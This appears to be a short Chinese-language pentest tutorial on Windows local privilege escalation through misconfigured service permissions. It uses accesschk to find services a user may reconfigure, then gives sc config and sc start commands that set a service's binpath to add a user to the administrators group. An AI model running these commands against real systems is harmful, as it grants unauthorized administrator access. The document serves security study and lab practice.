binpath本地提权

binpath本地提权是利用了服务权限不正确。在youtube上传了一个演示视频

参考资料:https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_windows.html

上一篇提到过,sc.exe是一个管理windows服务的命令。

检查服务配置的权限是否不安全

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

“SERVICE_CHANGE_CONFIG” permission. 任何用户都有修改配置的权限

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -uwcqv 用户名 * 查看用户可以有权修改哪些服务。

修改服务配置

使用sc命令

下面命令的意思是配置一个exe,作为服务启动。 sc config NewService binpath= "ntsd -d c:\windows\system32\NewServ.exe"

sc create whale2dll binpath= “C:\Program Files\DLL Hijack Service\dllhijackservice.exe” type= own

1
2
3
4
配置名称为daclsvc的服务,
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
net localgroup administrators